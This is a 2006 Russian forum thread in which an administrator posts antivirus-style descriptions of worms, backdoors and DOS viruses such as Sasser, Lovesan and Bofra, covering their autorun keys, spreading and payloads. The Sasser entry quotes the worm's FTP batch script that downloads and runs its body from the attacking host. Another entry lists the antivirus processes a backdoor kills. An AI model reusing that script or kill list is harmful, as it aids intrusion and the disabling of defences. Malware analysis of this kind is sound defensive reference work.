Осторожно!

Battle

Дата: Четверг, 2006.02.16, 02:20:53 | Сообщение # 26

Та все норм.

Группа: Администраторы

Сообщений: 864

Репутация: 2

Статус: Offline

W32.Buchon.A@mm

W32.Buchon.A@mm - это червь массовой рассылки, использующий свой собственный SMTP сервер, чтобы рассылать себя по email адресам, которые он найдет на зараженном компьютере.
Так же известен как W32/Baba-A [Sophos], W32/Buchon.gen@MM [McAfee], W32/Buchon@mm [F-Secure], Win32.Netsky.AG [Computer Associates], WORM_NETSKY.AI [Trend Micro].

При запуске W32.Buchon.A@mm выполняет следующие действия:

1. Открывает файл c:\csrss.exe, который является трояном, и выполняет его.

При запуске Троян выполняет следующие действия:

a. добавляет значение:

"Key Logger" = c:\csrss.exe"
в ключ реестра:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run
b. Открывает не злонамеренный файл c:\csrss.bin

c. Выступает в качестве прокси сервера и может выполнять команды атакующего на загрузку файлов из интернета.

2. Ищет email адреса в файлах с расширениями

# .dat
# .dbx
# .eml
# .mbx
# .mdb
# .tbb
# .wab
3. Крадет email адреса из файлов, имя которых содержит "inbox".

4. Посылает SYN пакеты по случайным IP адресам на случайные TCP порты в интервале между 28000 и 28500.

Настали суровые времена.
Связь: LEONeso@gmail.com

Battle

Дата: Четверг, 2006.02.16, 02:25:20 | Сообщение # 27

Та все норм.

Группа: Администраторы

Сообщений: 864

Репутация: 2

Статус: Offline

Worm.Win32.Sasser.a

Вирус-червь. Распространяется по глобальным сетям, используя для своего размножения уязвимость в службе LSASS Microsoft Windows. Ее описание приведено в Microsoft Security Bulletin MS04-011 (http://www.viruslist.com/click?_URL=http://www.microsoft.com/technet/security/bulletin/MS04-011.mspx).

Патч, исправляющий данную уязвимость был выпущен 13 апреля 2004 года (его можно найти по ссылке выше). Первые экземпляры червя были обнаружены 30 апреля 2004 года.

Принцип работы червя очень схож с тем, что был использован в черве Lovesan, в августе 2003 года, за исключением того, что Lovesan использовал аналогичную уязвимость в другой службе Windows - RPC DCOM.

Заражению подвержены компьютеры, работающие под управлением Windows 2000, Windows XP, Windows Server 2003. На других версиях Windows червь работоспособен, но заразить их извне, путем атаки через уязвимость, не сможет.

Червь написан на языке C/C++, с использованием компилятора Visual C. Имеет размер около 15 КБ, упакован PECompact2.

Признаками заражения компьютера являются:

Наличие файла "avserve.exe" в каталоге Windows.
Сообщение об ошибке (LSASS service failing) приводящее к перезагрузке системы.
Размножение
При запуске червь копирует себя в корневой каталог Windows с именем "avserve.exe" и регистрирует себя в ключе автозапуска:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run]
"avserve.exe" = "%WINDIR%\avserve.exe"
Создает в памяти уникальный идентификатор "Jobaka3l" для определения своего присутствия в системе.

Запускает FTP службу на порту TCP 5554 и запускает 128 процедур своего размножения. В ходе работы червь пытается вызвать системную процедуру AbortSystemShutdown для запрета перезагрузки системы.

Червь запускает процедуры выбора IP-адресов для атаки и отсылает на порт TCP 445 запрос. В случае если удаленный компьютер отвечает на соединение и отправляет эксплоит LSASS, который, используя данную уязвимость, запускает на удаленной машине командную оболочку "cmd.exe" на TCP порту 9996.

После этого червь передает на атакуемую машину команды для загрузки и запуска своего тела:

echo off
echo open [адрес машины с которой производится атака] 5554>>cmd.ftp
echo anonymous>>cmd.ftp
echo user
echo bin>>cmd.ftp
echo get [произвольное число]_up.exe>>cmd.ftp
echo bye>>cmd.ftp
echo on
ftp -s:cmd.ftp
[произвольное число]_up.exe
echo off
del cmd.ftp
echo on
Таким образом один и тот же компьютер может многократно подвергаться атакам и содержать несколько копий червя в виде файлов с именами, например:

23101_up.exe
5409_up.exe
и т.д.

Прочее
После заражения инфицированная машина выводит сообщение об ошибке LSASS service failing, после чего может попытаться перезагрузиться.

Червь создает в корневом каталоге диска C: файл "win.log", который содержит IP-адреса атакуемых машин.

Бесплатная утилита для удаления Sasser.a - ftp://ftp.kaspersky.com/utils/clrav/clrav.zip

Настали суровые времена.
Связь: LEONeso@gmail.com

Battle

Дата: Четверг, 2006.02.16, 02:25:53 | Сообщение # 28

Та все норм.

Группа: Администраторы

Сообщений: 864

Репутация: 2

Статус: Offline

Worm.Win32.Sasser.b

Настали суровые времена.
Связь: LEONeso@gmail.com

Battle

Дата: Четверг, 2006.02.16, 02:26:22 | Сообщение # 29

Та все норм.

Группа: Администраторы

Сообщений: 864

Репутация: 2

Статус: Offline

Worm.Win32.Sasser.c

Настали суровые времена.
Связь: LEONeso@gmail.com

Battle

Дата: Четверг, 2006.02.16, 02:29:25 | Сообщение # 30

Та все норм.

Группа: Администраторы

Сообщений: 864

Репутация: 2

Статус: Offline

I-Worm.Sober.i

Сетевой червь, распространяющийся по электронной почте в виде файлов, прикрепленных к зараженным письмам.

Написан на языке Visual Basic. Упакован UPX. Размер в упакованном виде 56808 байт.

Инсталляция
Червь активизируется, только если пользователь самостоятельно открывает вложенный файл.

После запуска червь выводит на экран ложное сообщение об ошибке:

WinZip Self-Extractor
WinZip_Data_Module is missing ~Error:
Создает в системном каталоге Windows два EXE-файла с именами, формируемыми из следующих частей:

32
crypt
data
diag
dir
disc
expolrer
host
log
run
service
smss32
spool
sys
win
Напр имер, "windiag.exe" и "data.exe".

Данные файлы являются основными компонентами червя, производящими сбор адресов и рассылку копий червя по электронной почте.

Червь регистрирует себя в ключе автозагрузки системного реестра:

[HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ]
"<случайный ключ>"="%System%\<имя файла червя>"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ]
"<случайный ключ>"="%System%\<имя файла червя>"
Создает еще несколько своих копий и вспомогательных файлов с разными именами в системном каталоге Windows:

clonzips.ssc
clsbern.isc
cvqaikxt.apk
dgssxy. yoi
nonzipsr.noz
Odin-Anon.Ger
sysmms32.lla
zi ppedsr.piz
Размножение
Червь ищет адреса email на жестких дисках в файлах с расширениями из приводимого ниже списка и рассылает на найденные зараженные письма.

abc
abd
abx
adb
ade
adp
adr
asp
bak
bas
cfg
cgi
cls
cms
csv
ctl
dbx
dhtm
doc
ds p
dsw
eml
fdb
frm
hlp
imb
imh
imh
imm
inbox
ini
jsp
ldb
ldif
lo g
mbx
mda
mdb
mde
mdw
mdx
mht
mmf
msg
na b
nch
nfo
nsf
nws
ods
oft
php
pl
pmr
pp
ppt
pst
rtf
shtml
slk
s ln
stm
tbb
txt
uin
vap
vbs
vcf
wab
wsh
x html
xls
xml

Для рассылки зараженных писем по найденным адресам червь использует прямое подключение к SMTP-серверу.

Найденные адреса электронной почты червь сохраняет в файлах с именами:

winexerun.dal
winmprot.dal
winroot64.dal
wins end32.dal
Зараженные письма содержат произвольные темы и тексты на немецком или английском языке (несколько десятков различных вариантов), которые составляются из нескольких доступных частей.

Имя вложения также может варьироваться. Допустимы расширения pif, zip и bat.

Прочее
Червь может загружать с удаленных сайтов на зараженный компьютер любые файлы и запускать их.

Настали суровые времена.
Связь: LEONeso@gmail.com

Battle

Дата: Четверг, 2006.02.16, 02:31:45 | Сообщение # 31

Та все норм.

Группа: Администраторы

Сообщений: 864

Репутация: 2

Статус: Offline

Macro.Word97.Blaster (aka Cont)

Опасный макро-вирус, известен также под именем "W97M.Cont". Заражает область системных макросов при открытии зараженного документа. Остальные документы заражает при их закрытии. Процед*ра заражения ищет процедуры вируса "ocument_Close" и "ocument_Open" и записывает их на диск в файл "C:\CONT.DBL". При заражении документа код вируса из этого файла добавляется в документ, при этом макросы присутствующие в документе не удаляются, кроме макросов, имена которых совпадают с именами процедур вируса.

В одном случае из двух вирус меняет информацию о документе (summary info):

Заголовок = "Macro Carrier"
Автор = "ream Blaster"
Ключевые слова = "Minny"

При закрытии документа вирус проверяет системную дату и по 17-м числам запускает процедуру, которая ищет файл "C:\MINNY.LOG" с установленными аттрибутами "скрытий" и "только чтение". Если такой файл не найден, процед*ра добавляет в файл "AUTOEXEC.BAT" команды которые удаляют все файлы и каталоги на дисках C:, D:, E: и F: при следующей перезагрузке компьютера.

Настали суровые времена.
Связь: LEONeso@gmail.com

Battle

Дата: Четверг, 2006.02.16, 02:32:09 | Сообщение # 32

Та все норм.

Группа: Администраторы

Сообщений: 864

Репутация: 2

Статус: Offline

CorporateLife

Неопасные резидентные полиморфик-вирусы. Перехватывают INT 21h и записываются в конец EXE-файлов при вызове функций DOS FindFirst/Next FCB. При заражении файлов используют FCB-вызовы. Содержат ошибки и могут портить файлы при заражении. Если на компьютере установлен Sound Blaster со Speech-драйвером, вирусы передают этому драйверу строку:

"CorporateLife.1929,1937": Fuck Corporat Life.
"CorporateLife.1931,1935,1939,1943,1947,195 1,1957,1961,1971":
Mini Cat

Вирусы также содержат строки:

"CorporateLife.1929,1937":

$B -=[$$$ Corporate Life $$$]=- P$

"CorporateLife.1931,1935,1939,1943,1947,1951,195 7,1961,1971":

B Mini-Cat 4/96 P

Настали суровые времена.
Связь: LEONeso@gmail.com

Battle

Дата: Четверг, 2006.02.16, 02:32:34 | Сообщение # 33

Та все норм.

Группа: Администраторы

Сообщений: 864

Репутация: 2

Статус: Offline

Indonga, семейство

Очень опасные резидентные зашифрованные вирусы. Перехватывают INT 21h и записываются в конец COM- и EXE-файлов. В зависимости от системной даты портят CMOS, или что-то проигрывают (пищат?) на Sound Blaster, или возвращают управление DOS вместо программы-носителя.

Indonga.2062,2125
Заражают файлы (кроме COMMAND.COM) при их запуске. 22-го и 24-го сентября стирают сектора дисков и выводят текст:

"Indonga.2062":

PINDONGA Virus V1.4. (Hecho en ARGENTINA)
Programado por: OTTO (16/9/77)
Saludos a: MAQ-MARIANO-SERGIO-ERNESTRO-COSTRA
PD: Alguien mate a Bill Gates (El WINDOWS SE CUELGA)

"Indonga.2125":

PINDONGA Virus. (Hecho en ARGENTINA)
Programado por: OTTO (16/9/77)
Saludos a: MAQ-MARIANO-SERGIO-ERNESTRO-COSTRA
PD: Alguien mate a Bill Gates (El WINDOWS SE CUELGA)

Indonga.3652,4010
Перехватывают также INT 20h, 2Fh. Заражают COMMAND.COM также как и файлы, к которым идет обращение. 16-го сентября, 25-го февраля, 21-го марта, 27-го августа "Indonga.3652" стирает сектора дисков и выводит текст:

PINDONGA Virus V5.6. (Hecho en ARGENTINA)
Programado por Otto (16977)
Saludos a MAQ-MARIANO-SERGIO-ERNESTRO-COSTRA-PABLIN
PD: Alguien mate a Bill Gates (El WINDOWS SE CUELGA)
PINDONGA Virus (Programado por OTTO en ARGENTINA) 16977.

"Indonga.4010" в зависимости от нескольких условий стирает сектора дисков и выводит текст:

+-----+
|SARIN|
|VIRUS|
|-----|
|HECHO|
| POR |
|-NOP-|
+-----+

Настали суровые времена.
Связь: LEONeso@gmail.com

Battle

Дата: Четверг, 2006.02.16, 02:33:02 | Сообщение # 34

Та все норм.

Группа: Администраторы

Сообщений: 864

Репутация: 2

Статус: Offline

Torpino

Неопасный резидентный полиморфик-вирус. Имеет внушительный размер - около 11Кб ассемблерного кода. Зашифрован двенадцатью полиморфик-циклами. Записывается в конец COM- и EXE-файлов кроме COMMAND.COM.

При инсталляции своей TSR-копии вирус правит блоки распределения DOS-памяти, выделяет себе блок памяти размера 12Кб и копирует туда свой код. В том случае, если вирус запускается из зараженного WIN.COM или KEYB.COM (т.е. из файла, который находится в памяти до следующей перезагрузки) вирус не выделяет себе DOS-память, а остается резидентно как часть запущенной программы.

В завершение своей инсталляции вирус перехватывает INT 9, 1Ch, 21h (клавиатура, таймер, DOS-функции) и затум заражает COM- и EXE-файлы, к которым идет обращение (запуск, открытие, создание, и т.д.). Перед тем, как вернуть управление программе-носителю, вирус также заражает файлы:

C:\WINDOWS\COMMAND\KEYB.COM
C:\DOS\KEYB.COM
C: \KEYB.COM

Вирус использует анти-антивирусные приемы. При инсталляции в память он ищет и отключает резидентные мониторы TBAV и SCAN. Не заражает антивирусы: VIRSTOP2, VIRSTOP, F-PROT, SCAN, TBAV, NAV. Уничтожает антивирусные файлы данных: CHKLIST.MS, ANTI-VIR.DAT.

При первом запуске на компьютере вирус создает файл KEYB.SYS в одном из каталогов C:\WINDOWS, C:\DOS или в C:\ (корневой). Вирус записывает туда текст:

Do not modify this file!
keyboard=1,0,x
keyboard=1,0,x
keyboard=1, 0,x
keyboard=1,0,x
keyboard=1,0,x
yy

где 'x' - любые ASCII-символы, а 'yy' - счетчик запусков зараженных файлов. В зависимости от этого счетчика вирус активизирует свои проявления, которые вызываются из перехватчиков INT 9 и INT 1Ch. Начиная с 1000 они выводят различные сообщения, меняют строки на экране, меняют символы в буфере клавиатуры и т.п. Начиная с 800-го запуска зараженной программы вирус также дописывает в файлу C:\AUTOEXEC.BAT команды, которые выводят одно из случайно выбранных сообщений:

Your keyboard has expired its evaluation period!
Please, register to Microsoft© Corporation.
Found hardware error on video card (code 23001):
Please, move your monitor and reboot the PC.
Found error: ah ah ah ah... eh eh eh eh.......
uh uh uh uh.... Dr.SCSI & Mr.IDE
Your Hard Disk is boring to live...
Youthanasia will start now... (formatting C:)
Found Boot error: replace the TORPINO Card
and reboot the system immediately !
This message is a property of F-PROT Antivirus:
Please, contact Fridrick for more info...

Вирус проверяет данные в дополнительном файле C:\TORPASS.DAT и в зависимости от его содержимого отключает некоторые свои проявления (если первые 4 байта этого файла совпадают с серийным номером диска C:). Если пятый байт этого файла ненулевой, вирус пищит спикером компьютера при заражении каждого очередного файла.

Вирус содержит строки текста, некоторые из них используются в эффектах вируса:

TORPINO
You are a Torpiner
C O N G R A T U L A T I O N S !
Your PC is my new house !
I'm not a destroyer...
I'm the incredible Virus...
--> T O R P I N O © <--
Turn on Sound Blaster Speakers !
We Thank Very Much The F-PROT Antivirus For The Contribution
To The Spread Of This Virus... Have A Good Time !
By The Virus TORPINO © Ver. 2.0, Copyright© 1997 By DR.SCSI And Mr. IDE.
Total Rows Code: 3474, Coded In ITALY, Around MATERA, In July-December 1997.
Direct Support: Our Heads; Dave Mustaine; Billy (A Programmer Dog!).
Indirect Support: The Great Dark Avenger; N.R.L.G Team; Peter Norton
(Smack !); Our WorkStation: Two 486; The Obscure Author Of Tentacle.

Настали суровые времена.
Связь: LEONeso@gmail.com

Battle

Дата: Четверг, 2006.02.16, 02:33:25 | Сообщение # 35

Та все норм.

Группа: Администраторы

Сообщений: 864

Репутация: 2

Статус: Offline

Worm.Win32.Lovesan.a

Вирус-червь. Распространяется по глобальным сетям, используя для своего размножения уязвимость в службе DCOM RPC Microsoft Windows. Ее описание приведено в Microsoft Security Bulletin MS03-026.

Червь написан на языке C, с использованием компилятора LCC. Имеет размер 6КB, упакован UPX. Размножается в виде файла с именем "msblast.exe".

Содержит текстовые строки:

I just want to say LOVE YOU SAN!!
billy gates why do you make this possible ? Stop making money and fix your software!!
Признаками заражения компьютера являются:

Наличие файла "msblast.exe" в системном (system32) каталоге Windows.
Сообщение об ошибке (RPC service failing) приводящее к перезагрузке системы.

Размножение

При запуске червь регистрирует себя в ключе автозапуска:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cu rrentVersion\Run
windows auto update="msblast.exe"
Червь сканирует IP-адреса, начинающиеся с "base address" и пытается соединиться с 20 IP-адресами для инфицирования уязвимых компьютеров.
После этого червь "спит" в течение 1,8 секунды, а затем снова сканирует 20 IP-адресов и повторяет этот процесс в бесконечном цикле. Например, если "base address" является 20.40.50.0, червь будет сканировать следующие адреса:

20.40.50.0
20.40.50.1
20.40.50.2
...
20.40.5 0.19
----------- пауза 1.8 секунды
20.40.50.20
...
20.40.50.39
---------- - пауза 1.8 секунды
...
...
20.40.51.0
20.40.51.1
...
20 .41.0.0
20.41.0.1
и так далее.
Червь выбирает один из двух методов сканирования IP-адресов:

В 3 случаях из 5 червь выбирает случайный "base address" (A.B.C.D), где D равен 0, а A, B, C случайно выбраны из диапазона 1-255. Таким образом "base address" находится в диапазоне [1-255].[1-255].[1-255].0.

В 2 случаях из 5 червь сканирует подсеть.

Он определяет адрес локального компьютера (A.B.C.D), устанавливает D в ноль и выбирает значение C. Если C - больше чем 20, то червь выбирает случайное число от 1 до 20. Если C меньше или равно 20, червь не изменяет его.

Например, если инфицированная машина имеет IP-адрес "207.46.134.191", то червь будет сканировать адреса с 207.46.[115-134].0. Если IP-адрес - "207.46.14.1", то червь будет сканировать адреса, начиная с 207.46.14.0.
Используя уязвимость в Microsoft Windows 2000/XP, отправляет на 135 порт выбранного IP-адреса команды эксплойта DCOM RPC и запускает на удаленной машине командную оболочку "cmd.exe" на TCP порту 4444.
После этого червь, при помощи команды tftp get, через 69 порт загружает себя на удаленную машину в системный каталог Windows и запускает на исполнение.

Прочее

После заражения инфицированная машина выводит сообщение об ошибке RPC service failing, после чего может попытаться перезагрузиться.

C 16 августа 2003 года червь запускает процедуры DDoS атаки на сервер windowsupdate.com, пытаясь таким образом затруднить или прервать его работу.

Настали суровые времена.
Связь: LEONeso@gmail.com

Battle

Дата: Четверг, 2006.02.16, 02:34:58 | Сообщение # 36

Та все норм.

Группа: Администраторы

Сообщений: 864

Репутация: 2

Статус: Offline

I-Worm.Bofra.a

Вирус-червь. Использует уязвимость в Internet Explorer. Распространяется через интернет в виде зараженных писем без вложения.

Червь не помещает свою копию в зараженное письмо, а помещает только ссылку на зараженный файл, находящийся на компьютере, с которого пришло это письмо. В момент обращения к полученной ссылке (происходит автоматически в случае срабатывания эксплойта приведенной выше уязвимости) происходит переполнение буфера и автоматический запуск зараженного файла. Письма рассылаются по всем найденным на зараженном компьютере адресам электронной почты.

Червь является приложением Windows (PE EXE-файл), имеет размер около 21КБ, упакован MEW. Размер распакованного файла около 135КБ.

Червь содержит в себе функцию бэкдора, принимающего команды по каналам IRC.

Инсталляция
После запуска червь копирует себя с произвольным именем, (любой набор символов, который всегда заканчивается на "32.exe", в системный каталог Windows.

Например:

C:\WINDOWS\SYSTEM32\kfilaxm32.exe
Затем регистрирует данный файл в ключе автозагрузки системного реестра:

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run ]
"Rhino" = "%System%\<любой набор символов>32.exe"
Распространение через email
Для поиска адресов жертв червь сканирует адресные книги MS Windows, а также ищет адреса в файлах со следующими расширениями:

adbh
aspd
dbxn
htmb
phpq
pl
shtl
tbbg
tx t
wab
При этом червем игнорируются адреса, содержащие следующие подстроки:

.edu
.gov
.mil
abuse
accoun
acketst
admin
a nyone
arin.
avp
berkeley
borlan
bsd
bugs
ca
certific
contact
example
feste
fido
foo.
f sf.
gnu
gold-certs
google
gov.
help
hotmail
iana
ibm.com
icrosof
icrosoft
ietf
info
inpr is
isc.o
isi.e
kernel
linux
listserv
math
m e
mit.e
mozilla
msn.
mydomai
no
nobody
nodo mai
noone
not
nothing
ntivi
page
panda
pgp
postmaster
privacy
rating
rfc-ed
ripe.
root
r uslis
samples
secur
sendmail
service
site
so ft
somebody
someone
sopho
submit
support
sym a
tanford.e
the.bat
unix
usenet
utgers.ed
we bmaster
you
your

При рассылке зараженных писем червь пытается осуществить прямое подключение к SMTP-серверам.

Характеристики зараженных писем
Отправитель:
Имя отправителя включает в себя одну из следующих строк:

adam
alex
alice
andrew
anna
bill
bob
bren da
brent
brian
claudia
dan
dave
david
debby
fred
george
helen
jack
james
jane
jerry
jim
jimm y
joe
john
jose
julie
kevin
leo
linda
mari a
mary
matt
michael
mike
peter
ray
robert
sam
sandra
serg
smith
stan
steve
ted
tom

Домен отправителя выбирается случайным образом из найденных на зараженном компьютере email-адресов или используется любой домен из списка:

aol.com
hotmail.com
msn.com
yahoo.com
Тема письма:
Выбирается из списка:

funny photos
hello
hey!
Текст письма:
Выбирается из следующих вариантов:

FREE ADULT VIDEO! SIGN UP NOW!

Look at my homepage with my last webcam photos!

Файл-вложение:
В письме нет никаких вложений. Червь отправляет только ссылку на зараженный компьютер. Ссылка имеет следующий формат:

http://<IP-адрес зараженного компьютера>:<номер открытого порта>/<название файла>
Червь открывает на зараженном компьютере TCP порт от 1639 и выше для скачивания файла.

Подпись к письму:
Выбирается из списка:

Checked by Dr.Web (http://www.drweb.net)
Checked for viruses by Gordano's AntiVirus Software
scanned for viruses by AMaViS 0.2.1 (http://amavis.org/)
Удаленное администрирование
Червь открывает на зараженной машине TCP порт 6667 для соединения с IRC-каналами для приема команд.

Настали суровые времена.
Связь: LEONeso@gmail.com

Battle

Дата: Четверг, 2006.02.16, 02:37:52 | Сообщение # 37

Та все норм.

Группа: Администраторы

Сообщений: 864

Репутация: 2

Статус: Offline

Backdoor.Jupdate

Backdoor.Jupdate - это бэкдор, который позволяет удаленному атакующему загружать и выполнять файлы на зараженном компьютере.
При запуске Backdoor.Jupdate выполняет следующие действия:

1. Копирует себя в следующий файл, с произвольным названием, состоящим от четыркх до восьми символов в нихнем регистре:

* %System%\[random name].exe
* %System%\[random name].dat (text file)
2. Добавляет значение:

"JavaUpdate0.07"="%system%\[dropped filename]"
в ключ реестра:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Cur rentVersion\Run
3.Пытается закрыть следующие процессы:

# ccapp.exe
# smc.exe
# zlclient.exe
# ZONEALARM.EXE
# WFINDV32.EXE
# WEBSCANX.EXE
# VSSTAT.EXE
# VSHWIN32.EXE
# VSECOMR.EXE
# VSCAN40.EXE
# VETTRAY.EXE
# VET95.EXE
# TDS2-NT.EXE
# TDS2-98.EXE
# TCA.EXE
# TBSCAN.EXE
# SWEEP95.EXE
# SPHINX.EXE
# SMC.EXE
# SERV95.EXE
# SCRSCAN.EXE
# SCANPM.EXE
# SCAN95.EXE
# SCAN32.EXE
# SAFEWEB.EXE
# RESCUE.EXE
# RAV7WIN.EXE
# RAV7.EXE
# PERSFW.EXE
# PCFWALLICON.EXE
# PCCWIN98.EXE
# PAVW.EXE
# PAVSCHED.EXE
# PAVCL.EXE
# PADMIN.EXE
# OUTPOST.EXE
# NVC95.EXE
# NUPGRADE.EXE
# NORMIST.EXE
# NMAIN.EXE
# NISUM.EXE
# NAVWNT.EXE
# NAVW32.EXE
# NAVNT.EXE
# NAVLU32.EXE
# NAVAPW32.EXE
# N32SCANW.EXE
# MPFTRAY.EXE
# MOOLIVE.EXE
# LUALL.EXE
# LOCKDOWN2000.EXE
# JEDI.EXE
# IOMON98.EXE
# IFACE.EXE
# ICSUPPNT.EXE
# ICSUPP95.EXE
# ICMON.EXE
# ICLOADNT.EXE
# ICLOAD95.EXE
# IBMAVSP.EXE
# IBMASN.EXE
# IAMSERV.EXE
# IAMAPP.EXE
# FRW.EXE
# FPROT.EXE
# FP-WIN.EXE
# FINDVIRU.EXE
# F-STOPW.EXE
# F-PROT95.EXE
# F-PROT.EXE
# F-AGNT95.EXE
# ESPWATCH.EXE
# ESAFE.EXE
# ECENGINE.EXE
# DVP95_0.EXE
# DVP95.EXE
# CLEANER3.EXE
# CLEANER.EXE
# CLAW95CF.EXE
# CLAW95.EXE
# CFINET32.EXE
# CFINET.EXE
# CFIAUDIT.EXE
# CFIADMIN.EXE
# BLACKICE.EXE
# BLACKD.EXE
# AVWUPD32.EXE
# AVWIN95.EXE
# AVSCHED32.EXE
# AVPUPD.EXE
# AVPTC32.EXE
# AVPM.EXE
# AVPDOS32.EXE
# AVPCC.EXE
# AVP.EXE
# AVNT.EXE
# AVKSERV.EXE
# AVGCTRL.EXE
# AVE32.EXE
# AVCONSOL.EXE
# AUTODOWN.EXE
# APVXDWIN.EXE
# ANTI-TROJAN.EXE
# ACKWIN32.EXE
# _AVPM.EXE
# _AVPCC.EXE
# AVP32.EXE
4. Прослушивает произвольный TCP порт и ожидает команд от удаленного атакующего. Это позволяет атакующему скачивать и запускать файлы на зараженной машине.

Настали суровые времена.
Связь: LEONeso@gmail.com

Battle

Дата: Четверг, 2006.02.16, 02:38:17 | Сообщение # 38

Та все норм.

Группа: Администраторы

Сообщений: 864

Репутация: 2

Статус: Offline

Zombie.VPI

Резидентные вирусы, записываются в конец EXE-файлов при их запуске, открытии и чтении/изменении атрибутов файла. Используют два необычных приема: кодирование при заражении файлов и запись своей TSR-копии в Shadow RAM.

При запуске зараженного файла вирус проверяет порты Shadow RAM (эти порты присутствуют только на Pentium-компьютерах). Если порты доступны, вирус ищет "дыру" подходящего размера в Shadow RAM, открывает ее на запись, копирует туда свой код и закрывает Shadow RAM. Если свободного места в Shadow RAM недостаточно, вирус либо записывает себя вместо одного из стандартных фонтов, либо ищет и записывается вместо кода какого-то драйвера, если фонт или драйвер расположен в Shadow RAM. Затем вирус перехватывает INT 13h и при запуске любого EXE-файла перехватывает INT 21h.

После инсталляции своей TSR-копии в Shadow RAM вирус закрывает ее на запись. При вызовах INT 13h, 21h, если вирусу необходимо произвести изменения в своих данных, он временно разрешает запись в Shadow RAM.

При заражении файлов вирус достаточно забавным способом кодирует свое тело - байты кода вируса не шифруются, как это бывает с обычными шифрованными вирусами, а переводятся в последовательность байт, принимающих всего два значения - 0 и FFh. Каждый байт кода вируса записывается в виде последовательности из восьми байт - нулевые биты байта преобразуются в 0, а 1 - в FFh. В результате, имея длину менее 2K, вирус увеличивает длины EXE-файлов более чем на 15K.

При чтении секторов, содержащих информацию о каталоге, вирус ищет и уничтожает в них ссылки на файлы: ADINF, AIDS, AVP, WEB, DRWEB, *.CPP, *.C, S-ICE, TD, DEBUG, WEB70801, CA.AV?

Вирус также содержит текст:

Z0MBiE`1635 v1.00 © 1997 Z0MBiE
Tnx to S.S.R. & Lerg
ShadowRAM/Virtual Process Infector

Настали суровые времена.
Связь: LEONeso@gmail.com

Battle

Дата: Четверг, 2006.02.16, 02:38:54 | Сообщение # 39

Та все норм.

Группа: Администраторы

Сообщений: 864

Репутация: 2

Статус: Offline

HLLP.Tomsk.8506

Неопасный нерезидентный вирус. Написан на Паскале. При запуске ищет .EXE-файлы во всех подкаталогах текущего диска записывается в их начало. Для того, чтобы передать управление программе-носителю, вирус временно лечит свой файл и запускает его на выполнение.

Вирус проверяет защиту от записи для текущего диска. Если диск защищен от записи, то вирус выводит сообщение "Runtime Error: Disk fool or write protect" и прекращает свою работу.

20 октября вирус выводит сообщение и ждет нажатия на клавишу:

Сегодня у моего автора день рождения!!!
Ты рад [Y/N]

Если пользователь нажимает клавишу 'N', то вирус выводит сообщение и завешивает компьютер:

Ну ты, блин, круто встрял!!! Я твой фат в память скопировал!!! Если пере-
загрузишь машину -- информацию не восстaновишь!!!

Если пользователь нажимает 'Y', то вирус выводит сообщение и продолжает работу:

Доставай пиво и водку... Щас синячить будем!!! Зови баб!!! Врубай музыку!
Раз ты такой хороший -- я тебе ничего портить не буду!!!

Если в командной строке указать ключ /?, то вирус выводит сообщение:

+------------------------------------+
| Virus 3.14Zdec V 2.0 |
|------------------------------------ |
| Target *.EXE |
| Stealth No |
| TSR No |
| Attac speed Slow |
| anger 0 |
| Effects Yes |
| Length KingSize= |
| Language Turbo Pascal |
| OS Dos, Windows |
| |
| Данный вирус был написан в учебных|
| целях. Если данный образец самоход-|
| ного програмного обеспечения ока- |
| зался у Вас--Вам следует воспользо-|
| ваться антивирусной программой!!!|
| СПАСИБО ЗА ВНИМАНИЕ |
|Russia, Tomsk, 20/11/1999 |
+------------------------------------+

Настали суровые времена.
Связь: LEONeso@gmail.com

Battle

Дата: Четверг, 2006.02.16, 02:39:30 | Сообщение # 40

Та все норм.

Группа: Администраторы

Сообщений: 864

Репутация: 2

Статус: Offline

HLLC.Cumulus

Откомпилированы на языках высокого уровня (High Level Language) и часто содержат строки-копирайты от соответствующих компиляторов:

Turbo C++ - Copyright 1990 Borland Intl. Null pointer assignment
Abnormal program termination
Divide error
Runtime error

Делятся на группы: HLLC: High Level Language Companion viruses. Являются компаньон-вирусами. HLLO: High Level Language Overwriting viruses. Ищут файлы и записываются вместо них. HLLP: High Level Language Parasitic viruses. Записываются в конец или начало файлов, зараженные файлы остаются работоспособными.

HLLC.16850
Ищет .EXE-файлы и создает companion-файлы, имеющие имя .EXE-файла и расширение .COM. Написан на Turbo-C.

HLLC.17690
Нерезидентный неопасный вирус, ищет .COM- и .EXE-файлы в дереве подкаталогов случайно выбранного диска, затем переименовывает их в файлы со случайными названиями, сохраняет эти названия в своем теле в закодированном виде и записывается на диск под первоначальным именем файла. При запуске зараженного файла вирус выполняет (используя при этом соответствующую функцию DOS) переименованный файл. Таким образом содержимое файлов при заражении не изменяется. Вирус проверяет содержимое файлов на наличие строки "Microsoft Windows" и не трогает файлы с такой меткой. При возникновении ошибки вирус выводит сообщение: "Bad command or file name" и возвращается в DOS. Создан при помощи языка C - в кодах вируса можно найти несколько строк, вставляемых компилятором в коды программ.

HLLC.Cornucopia
Зашифрован и запакован PKLite. Записывает себя в файлы в двух различных формах. Содержит строку:

detected the "Cornucopia Virus"

HLLC.CP-Man
Содержит (выводит?) строки:

Very fast interrupt handler © PC Ace Technologies.

Let me present: CP-VIRUS!
Copyright © 1994-1995 CP-MaN of CP-DeZiGN
Written in Vasteras of Sweden!
Ya know... Your mom can't save ya know!
######## #########
Greets: # # # Oh, dear! I've trashed some sectors, but
# # # still have them in memory (encrypted) and
Phalcon # ######### will write them back to your disk if you
Skism, # # just do as I say. Shit happens!
Immortal # #
Riot, ######## #
Dark
Avenger

Check this counter. If you reset or turn your computer off now all your
data will be lost forever. However, if you wait until the counter has
reached zero you won't lose any data! It's your choice. Happy waiting!
CP CP CP CP CP CP CP CP CP CP CP CP CP CP CP CP CP CP CP CP CP CP CP
left, then you will get your data back. Happy waiting!
Finished! I'm impressed. You did really wait didn't you? Well, I just want
you to know that I keep my promises. No data is destroyed.
Oh, just one more thing. This virus does not destroy data at all, it would
have been enough to reset the computer. Hope you enjoyed waiting! Hehehe...

C:\DOS\MEM.DAT
C:\DOS\MEM.EXE
COMSPEC
/C REN C:\DOS\MEM.EXE MEM.DAT
/C COPY
C:\DOS\MEM.EXE >NUL
